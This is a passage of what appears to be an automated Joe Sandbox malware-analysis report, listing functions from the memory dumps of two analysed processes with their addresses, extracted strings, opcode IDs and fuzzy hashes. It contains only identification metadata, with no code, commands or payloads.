                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "9f$r6f$r6f$r6f$r6f$N_H
                                    • API String ID: 0-1092036463
                                    • Opcode ID: d143c28d5120f58b1d43dcb013ff5f8d8bdb83ac253164cdfe32ecebda49cacd
                                    • Instruction ID: 8ca50b7b2e7344c1ae017eb3f4bb834a3de0b48ae717a5305b67b012b8b9c990
                                    • Opcode Fuzzy Hash: d143c28d5120f58b1d43dcb013ff5f8d8bdb83ac253164cdfe32ecebda49cacd
                                    • Instruction Fuzzy Hash: AD616971E5894E8FEB98DBA8C8567AD7BF1FF59380F5400B9C00DC72D6DA686841CB42
                                    Function 00007FF887AD2195 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0Wp
                                    • API String ID: 0-545783698
                                    • Opcode ID: 4a618bb7155c9aa9b053c0fe2687ca72e46ea8726e44298bd3224393594762b5
                                    • Instruction ID: abe4c5a1d0d083bc10a7d821ba9d329a471706df0f4c3c0ff78f18a251acfb70
                                    • Opcode Fuzzy Hash: 4a618bb7155c9aa9b053c0fe2687ca72e46ea8726e44298bd3224393594762b5
                                    • Instruction Fuzzy Hash: 2641D531A4D68A4FE796977884562BD7BF0FF86350B0545BAE44CC71D7EE2CA881C342
                                    Function 00007FF887AD37BA Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: b4f
                                    • API String ID: 0-3391181744
                                    • Opcode ID: 66077448b23ebb77d4ee4706d977b28ac59e7c32161b3b1decbad997a2ac7a17
                                    • Instruction ID: faa4ab311853b05ffe669f23daaf6913b28372b41c78ea2959cb7fba739d0c70
                                    • Opcode Fuzzy Hash: 66077448b23ebb77d4ee4706d977b28ac59e7c32161b3b1decbad997a2ac7a17
                                    • Instruction Fuzzy Hash: 7A318C71A19A0E8FE748DFA8D8153ED7BF1EB95391F9001BAC00DD76C6CBB818558B81
                                    Function 00007FF887AD1718 Relevance: .3, Instructions: 260COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1cf8e0abe93ed18b725e391a57996b9468c95cff6e638955b0fa387a15759c2c
                                    • Instruction ID: 5aa6e29aaa3ff61357ba313a7e6a54d9fb4e8228ccfda77e7e20c259e020e415
                                    • Opcode Fuzzy Hash: 1cf8e0abe93ed18b725e391a57996b9468c95cff6e638955b0fa387a15759c2c
                                    • Instruction Fuzzy Hash: DD718E32A58A498FDB48DE1CD8566BD7BE2FF98744F15417AD45EC32C2DE34A802C781
                                    Function 00007FF887AD1D7D Relevance: .2, Instructions: 191COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b0b7a6e7fcd8394cb1e4187aad9b2887cd2f4a6a773397d6df6c1fc9d092c0ca
                                    • Instruction ID: 67a6bba767a6a060187250c497d495e8b816e3c38a290812b915ed8169ac9241
                                    • Opcode Fuzzy Hash: b0b7a6e7fcd8394cb1e4187aad9b2887cd2f4a6a773397d6df6c1fc9d092c0ca
                                    • Instruction Fuzzy Hash: F551C231A58A498FDB48DE1CC8556BA77E2FF98740B15467ED44EC7286CE34E802CB81
                                    Function 00007FF887AD31E5 Relevance: .2, Instructions: 167COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0d2284ddb5ca5094f1b5c2fa8a74b603145392f7ecc126c4d4fa516a17bbb42c
                                    • Instruction ID: 5ec92f4cd36519b7c0fdf40d4cfc30c3eb21ef34aef033a45899218d09ebd711
                                    • Opcode Fuzzy Hash: 0d2284ddb5ca5094f1b5c2fa8a74b603145392f7ecc126c4d4fa516a17bbb42c
                                    • Instruction Fuzzy Hash: 01511475D4861ECFEB58EBA8C4566ECBBB1FF58351F50007AD009E72D2DA78A984CB40
                                    Function 00007FF887AD3575 Relevance: .1, Instructions: 76COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 65aeaa94ab8e74266001706f4725ed9c27d92b1257ff8aecb2e9d96b89aec15f
                                    • Instruction ID: a5d72b6873bfa0bdff0da5971cceaeecf8e6f60b81b43bd2012e83fe1a771d41
                                    • Opcode Fuzzy Hash: 65aeaa94ab8e74266001706f4725ed9c27d92b1257ff8aecb2e9d96b89aec15f
                                    • Instruction Fuzzy Hash: D5216874A4854E8FEB55EB68C85A6BD7BF0FF18340F4008BAD41DCB192EA38A584C741
                                    Function 00007FF887AD0A01 Relevance: .1, Instructions: 68COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 19b5f85dc872f7683830321245f0f180947fc422363c4e2e5171d2cda70152dc
                                    • Instruction ID: eff93574b83bcaba04eeb87144db5aa15d7a1bf718eec407ed99ecbb0460571e
                                    • Opcode Fuzzy Hash: 19b5f85dc872f7683830321245f0f180947fc422363c4e2e5171d2cda70152dc
                                    • Instruction Fuzzy Hash: 09115E70D5854E9FE780EB68848A2FE7BF0FF58350F4445B6C428C61A2EE38A444C751
                                    Function 00007FF887AD2444 Relevance: .1, Instructions: 62COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d7caba7d99fe9d24d713e4693a314dfa701f8c8ea7810b4b2243062419f418f1
                                    • Instruction ID: 67d33bbe16d8736e092224b203a07248da40f37748d2d2828628d1245ed70717
                                    • Opcode Fuzzy Hash: d7caba7d99fe9d24d713e4693a314dfa701f8c8ea7810b4b2243062419f418f1
                                    • Instruction Fuzzy Hash: 12112630D985298EEB68EB10C862BFDBB74FF55340F0001BAC01EA21D2DE786984CF40
                                    Function 00007FF887AD112D Relevance: .1, Instructions: 61COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d529a59c2ea1189279da4b211f0c18876736706366305d055182217d773a0e9f
                                    • Instruction ID: c788882bfdf3fd5d0b5e13c2227beff3f33c499ab56dfcff53faf66257a9660e
                                    • Opcode Fuzzy Hash: d529a59c2ea1189279da4b211f0c18876736706366305d055182217d773a0e9f
                                    • Instruction Fuzzy Hash: D011DD70D4864A8EEB99AB68C45A3FE7FF0FF59350F0504BEE01ACA0D2EA396544C701
                                    Function 00007FF887AD0EFD Relevance: .1, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 55354841fcf94f2a39b7861f77cf633a7bdce625f8c7fd176a7ccb5746a5008b
                                    • Instruction ID: 1feee620bb71b588ab92b02ea452f6539612a29cfd58c31a8ed6154a2bdc1967
                                    • Opcode Fuzzy Hash: 55354841fcf94f2a39b7861f77cf633a7bdce625f8c7fd176a7ccb5746a5008b
                                    • Instruction Fuzzy Hash: 58114231E4890E8FEB54EB54C896BEE77B1FB98340F204675C01AD72D6CE386985CB81
                                    Function 00007FF887AD2EF1 Relevance: .0, Instructions: 50COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7cb1e0999d5c506aa6b1c905d6ea96a8366d77561a35e9f9f24c109fbfa03b4a
                                    • Instruction ID: 7f0b8def83a5e59df909e09530bb74c647663d668a557f3db23de00caebb16ab
                                    • Opcode Fuzzy Hash: 7cb1e0999d5c506aa6b1c905d6ea96a8366d77561a35e9f9f24c109fbfa03b4a
                                    • Instruction Fuzzy Hash: 7C017C3199864A8FE751EB24884A6FD7FF0FF19340F0549B6D408CA0E6EA38A494C601
                                    Function 00007FF887AD05D8 Relevance: .0, Instructions: 50COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1831749974392bfe9103929cec3251f3a526ea7d46e1684034fd16ccf4c3fb16
                                    • Instruction ID: 813579ae7ed20211e27a4cec01d8004cd47fadba644a88a0bca5e493c3cc840f
                                    • Opcode Fuzzy Hash: 1831749974392bfe9103929cec3251f3a526ea7d46e1684034fd16ccf4c3fb16
                                    • Instruction Fuzzy Hash: 5E018C3094950E8FEB48EF64C0566BD7BB1FF59344F61087AD40EC61D2CB35A590CB40
                                    Function 00007FF887AD28CD Relevance: .0, Instructions: 46COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1ce1a0469e13d8abdc7750c4bea51e949b766615cd09f8a438caa5a6af3424c5
                                    • Instruction ID: 380508698fd4315579060c1979de2bf7f13bc0458404bd5ee7f5f556f0923f4c
                                    • Opcode Fuzzy Hash: 1ce1a0469e13d8abdc7750c4bea51e949b766615cd09f8a438caa5a6af3424c5
                                    • Instruction Fuzzy Hash: 4B015A3198864D8FE751AB64848A6FD7BF1FF19350F4545B6E408C60E2EA38A584C741
                                    Function 00007FF887AD341A Relevance: .0, Instructions: 44COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c97c872ee06d567992439c6b1a804d9681754c022f05c8c6e276737b6b35f9e1
                                    • Instruction ID: 9469b4a6964cc503c8e5d5d7bb5cde72722332757c2f36f1ce1c7df8f44e5682
                                    • Opcode Fuzzy Hash: c97c872ee06d567992439c6b1a804d9681754c022f05c8c6e276737b6b35f9e1
                                    • Instruction Fuzzy Hash: 24012874D5890E9EEB91EFA8C84D2BE7AF0FF18341F0049B6D41DC7092EA78A184CB41
                                    Function 00007FF887AD2F69 Relevance: .0, Instructions: 43COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 76977bad5c4fcc60c1f3ddf9d0fff9f5ea4110bc681ed104a9a2917c670937ac
                                    • Instruction ID: 941a2e84990434ff8376c21d420f162f4fe3428f45ff27621e29fd2404cc56c0
                                    • Opcode Fuzzy Hash: 76977bad5c4fcc60c1f3ddf9d0fff9f5ea4110bc681ed104a9a2917c670937ac
                                    • Instruction Fuzzy Hash: 7201713198D6894FE751AB24885A5ED7FF0FF5A350F0508B6D408CB0E7EA2CA594C701
                                    Function 00007FF887AD0610 Relevance: .0, Instructions: 42COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f45d60cd26176fd9014d8611d88b2e6cecdcbccd58bb3357a6e05edf71f635ad
                                    • Instruction ID: 79c0597d0b936f1678fc49315fcb6fb647060312c3d77c79960529bc3e43ab88
                                    • Opcode Fuzzy Hash: f45d60cd26176fd9014d8611d88b2e6cecdcbccd58bb3357a6e05edf71f635ad
                                    • Instruction Fuzzy Hash: 4C01813095850DCAEB58EB64C45A2BD77B0FF18346F50087ED41EC61D2DF39A590C701
                                    Function 00007FF887AD0608 Relevance: .0, Instructions: 42COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 74f82f57d425e24384f685b654c6c37c11c94db77b8526e74f8df784e3537881
                                    • Instruction ID: 35ff8f54978f596dccfc979ffe8a62107a64a6d5d834f2e8d3070a255481f4c4
                                    • Opcode Fuzzy Hash: 74f82f57d425e24384f685b654c6c37c11c94db77b8526e74f8df784e3537881
                                    • Instruction Fuzzy Hash: B4016D3095850E8FEB59EB64C4492BD76B0FF18346F50087ED41EC61D2DF39A594C741
                                    Function 00007FF887AD1CFD Relevance: .0, Instructions: 41COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 780a31b39b63f10395516ecb39693d7cf7cb597f3a828e8978dddf0fece6980b
                                    • Instruction ID: fdcb3d50ec4879c45cad503908b3e47730fd95ff292bddd86d2d2483fe5a632e
                                    • Opcode Fuzzy Hash: 780a31b39b63f10395516ecb39693d7cf7cb597f3a828e8978dddf0fece6980b
                                    • Instruction Fuzzy Hash: 3F01AD7094A68D8FDB589F24C4662FD3FB1FF15300F5604BAD408C61D2DB399990CB40
                                    Function 00007FF887AD1140 Relevance: .0, Instructions: 41COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b6d842f2f12ac8d3f6589e0b6a5fb59edf34f493558c945e250f11f9614156cc
                                    • Instruction ID: c18ae4262beb3b49f107e8eb12235e28951bbca85ccb3636f3f8102e0399af9f
                                    • Opcode Fuzzy Hash: b6d842f2f12ac8d3f6589e0b6a5fb59edf34f493558c945e250f11f9614156cc
                                    • Instruction Fuzzy Hash: 16F0FF30D58A1E8AFB98AB68D84A3FE7BF0FF96354F00057EE41EC20C2DE241154C201
                                    Function 00007FF887AD05D0 Relevance: .0, Instructions: 39COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: aea8ab07815f04d168a1616692338be5088dcad5848f31797ce283d0d7b4333a
                                    • Instruction ID: 5ddabab4ec28ba99e0784a2a406d89d87474f4bcae4def6fe4390591b7a6314e
                                    • Opcode Fuzzy Hash: aea8ab07815f04d168a1616692338be5088dcad5848f31797ce283d0d7b4333a
                                    • Instruction Fuzzy Hash: BBF0AF3094964E8FEB44EE24C4162FE3BA0FF05348F51087AE80DC20D2DB35A590CA81
                                    Function 00007FF887AD27E9 Relevance: .0, Instructions: 35COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 523bae42cd7c4ec6962e28834e8db9bd02e549fd91d9344fc67826741f3d294c
                                    • Instruction ID: 41fc9501a678d1c10c791d32b60f0ef5ce7f47d1a2c29f76fad01d99c5bd5194
                                    • Opcode Fuzzy Hash: 523bae42cd7c4ec6962e28834e8db9bd02e549fd91d9344fc67826741f3d294c
                                    • Instruction Fuzzy Hash: 6EF0493184E78A8FEB5A9B2488562ED3FB0FF56205F4508BAD419C61D3DA2D9898C742
                                    Function 00007FF887AD285D Relevance: .0, Instructions: 33COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 377881dc25fe95cd8bc941f6307ae1947f19d08971ae0a7dde1d4bed0e63c2f7
                                    • Instruction ID: c90760617b0459b90e0a804d65c5cd195901c51b0b20bb3b8d89218bcc084911
                                    • Opcode Fuzzy Hash: 377881dc25fe95cd8bc941f6307ae1947f19d08971ae0a7dde1d4bed0e63c2f7
                                    • Instruction Fuzzy Hash: 3DF09A3188968ACBEB599F64885A2FD3BB0FF15306F4404BEE819C61D2DB3D9494C701
                                    Function 00007FF887AD3F66 Relevance: .0, Instructions: 18COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c426eb85eca6ac21900330bdedabb5b409d69e244e3d01691483efb13709912
                                    • Instruction ID: 43317c8a4dae5852556943a01e46c870851d0f69c1b1554d646452b3b3653141
                                    • Opcode Fuzzy Hash: 0c426eb85eca6ac21900330bdedabb5b409d69e244e3d01691483efb13709912
                                    • Instruction Fuzzy Hash: 84E02270D1592D8FDBA4DA048845BEABAB1BF49342F1005E9844DE6281DA745E80CF44

                                    Executed Functions

                                    Function 00007FF887AE35F5 Relevance: 7.7, Strings: 6, Instructions: 194COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "9f$r6f$r6f$r6f$r6f$M_H
                                    • API String ID: 0-1129421110
                                    • Opcode ID: 67f79dfeb3edf78d29b8c6ca377dc653111173108b44a9dc09e0e9b60194cdb3
                                    • Instruction ID: 5ae8b38671c9a1979386809a64ff7c7e29f8c65edd777f582013e3a914aa9ff4
                                    • Opcode Fuzzy Hash: 67f79dfeb3edf78d29b8c6ca377dc653111173108b44a9dc09e0e9b60194cdb3
                                    • Instruction Fuzzy Hash: 94619C7291894A8FEB94EB68C8567FD7BF1FF5A380F4001B9C00DC7296DA686841CB41
                                    Function 00007FF887AE2195 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0Wp
                                    • API String ID: 0-545783698
                                    • Opcode ID: f6f82237ef7657f642f8cfd399c0237fb006c51c633cb22e82bfa13883c1e32e
                                    • Instruction ID: f5c984106959948d243b58974f42845fea04c8d6283c06985c8a266b8f9e83fb
                                    • Opcode Fuzzy Hash: f6f82237ef7657f642f8cfd399c0237fb006c51c633cb22e82bfa13883c1e32e
                                    • Instruction Fuzzy Hash: 1C412932A4DA8A4FE795D77888562BD7BF1FF46350B0505BBD44CC71D2DD28A881C342
                                    Function 00007FF887AE37BA Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: b4f
                                    • API String ID: 0-3391181744
                                    • Opcode ID: f7e1aeba5e42c2a21aeeee17f7eb1765640a25be8d2bc636abf9b9167cae94ad
                                    • Instruction ID: a16758c617edaea5ce3e509138e89680fc7c81f9668436938cdee394f613a80a
                                    • Opcode Fuzzy Hash: f7e1aeba5e42c2a21aeeee17f7eb1765640a25be8d2bc636abf9b9167cae94ad
                                    • Instruction Fuzzy Hash: 64318C72A1990E8FE748DF68E8153ED7BF1EB96391F5002BAC00DD72C6CBB914558B41
                                    Function 00007FF887AE1718 Relevance: .3, Instructions: 260COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0e0ef7c0185c1780fbe1914ad929b24fd8a018a992154f51986147f8b84d86a4
                                    • Instruction ID: 473b8774ed2bf98ff0115f2c3332b6871dd780b931c68ae91b0726fbc1301d08
                                    • Opcode Fuzzy Hash: 0e0ef7c0185c1780fbe1914ad929b24fd8a018a992154f51986147f8b84d86a4
                                    • Instruction Fuzzy Hash: 85719032E58A598FDB89DE1CD8626BD77E2FF98744B14417AD45EC3282DE34A802C781
                                    Function 00007FF887AE1D7D Relevance: .2, Instructions: 191COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 534118afd4fe6c783c2eccabdc3e658208ab1f7129d736fa52a6e071a2d95928
                                    • Instruction ID: b31f66160b5ab28b829c424c470890aab18da227c8bee21bedac12c155b4346f
                                    • Opcode Fuzzy Hash: 534118afd4fe6c783c2eccabdc3e658208ab1f7129d736fa52a6e071a2d95928
                                    • Instruction Fuzzy Hash: FF51B132A58A598FDB88DE1CC8556BE77E2FF98750B14467ED44EC3285CE34E802CB81
                                    Function 00007FF887AE31E5 Relevance: .2, Instructions: 167COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bb3a9409c14906b91d1b7f4e9413192ac390ade2846efd80d21c1a1dedfc3998
                                    • Instruction ID: 726f86f715d03cdab1135ea11b731d3c1bf1909600f8308994e67ba4ab30b0dc
                                    • Opcode Fuzzy Hash: bb3a9409c14906b91d1b7f4e9413192ac390ade2846efd80d21c1a1dedfc3998
                                    • Instruction Fuzzy Hash: B2512776D4861E8FEB58EBA4C456AEDBBB1FF58350F50407AD00DE7292DA386984CB00
                                    Function 00007FF887AE3575 Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 973d36db744a68af0ca735415960c19f60ecf92239ced5e0e644c4c93d06d598
                                    • Instruction ID: 0a115f1f6cd7b5cea6a7eff23b20cf9850fea2aa4252a3a3f74b541be7f72dd3
                                    • Opcode Fuzzy Hash: 973d36db744a68af0ca735415960c19f60ecf92239ced5e0e644c4c93d06d598
                                    • Instruction Fuzzy Hash: 6621CD7598894E8FEB55EB28C45A2BE3BF0FF58300F0008BAD01DCB291EB38A544C711
                                    Function 00007FF887AE0A01 Relevance: .1, Instructions: 68COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
